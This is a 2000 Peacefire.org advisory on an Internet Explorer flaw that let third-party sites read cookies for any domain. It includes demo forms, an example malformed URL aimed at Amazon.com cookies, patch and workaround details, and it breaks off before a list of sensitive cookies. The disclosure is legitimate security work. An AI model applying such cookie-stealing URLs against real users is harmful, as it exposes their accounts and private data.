Peacefire.org Youth against Internet censorship "It's not a crime to be smarter than your parents." |
Bennett Haselton, bennett@peacefire.org
Jamie
McCarthy, jamie@mccarthy.org
5/11/2000
News sightings: Wall Street
Journal | NYTimes
| CNNfn |
Slashdot | CNet | Internet News
Radio | Newsbytes
MSNBC | ComputerWorld
| National
Post | WebDeveloper.com
See also:
JavaScript-in-cookies
security hole (4/19/00) C-Net | ZDNet |
NTSecurity
| MSNBC
Eudora "stealth
attachment" demo page (4/27/00) C-Net | ZDNet |
Newsbytes | The Register
Internet Explorer
"local JavaScript" security hole (5/5/00) C-Net | NewsBytes
"Fake mail form"
security hole for Web-based email sites (5/9/00) C-Net | CNN.com
HotMail
Attachment security hole (5/10/00) Wired | ZDNet |
Slashdot
| MSNBC | CNN.com
Any Web site that uses cookies to authenticate users or store private information -- including Amazon.com, HotMail, Yahoo Mail, DoubleClick, MP3.com, NYTimes.com, and thousands of others -- could have cookies exposed by Internet Explorer and intercepted by a third-party Web site.
Update 5/18/2000: Microsoft has released a patch that will fix this
vulnerability in Internet Explorer:
http://www.microsoft.com/technet/security/bulletin/ms00-033.asp
If you have Internet Explorer for Windows, type a domain (e.g.
"yahoo.com" or "hotmail.msn.com") in the space below, and click to view a
page on Peacefire.org that will display your cookie for that
domain: (You must click the button to submit the domain name -- hitting Enter will not work) |
Pascal Gaudette reported
that the same scheme will work for HTTPS cookies as long as the server
referenced by the "malformed URL" is HTTPS-enabled. You can use this form
to read HTTPS cookies (enter a domain name and press the button): (You must click the button to submit the domain name -- hitting Enter will not work) |
How it works
Using a specially constructed URL, a Web site can read
Internet Explorer cookies set from any domain. For example, to read a user's
Amazon.com cookie, a site could direct the user's browser to:
http://www.peacefire.org/security/iecookies/showcookie.html?.amazon.com/
If
you replace the "%2f"'s with "/" characters, and the "%3F" with "?", this URL is
actually:
http://www.peacefire.org/security/iecookies/showcookie.html?.amazon.com
But
IE gets confused and thinks the page is located in the Amazon.com domain, so it
allows the page to read the user's Amazon.com cookie.
Affected:
Internet Explorer (all known versions) for Windows 95,
98, NT, and 2000. IE for the Macintosh does not appear to be affected. Users
have reported that IE versions for Solaris and HP/UX are vulnerable, but
IE's browser share on UNIX platforms is much lower. No version of Netscape
Navigator or any browser other than Internet Explorer appears to be vulnerable.
Workaround:
As of 5/18/2000, Microsoft has released a patch that
fixes this problem:
http://www.microsoft.com/technet/security/bulletin/ms00-033.asp
If you do not want to download the patch, the safest workaround is to
disable cookies. You can do this by going to
Tools->Internet
Options->Security
and click the button to customize security settings,
and set cookies to "disable". (Note that this will cause some sites such as
HotMail to break.) Also, if you have Netscape's browser installed, it is not
affected by the bug.
Implications
Jamie McCarthy came up with a list of cookies set
by various sites that could be used to retrieve sensitive information: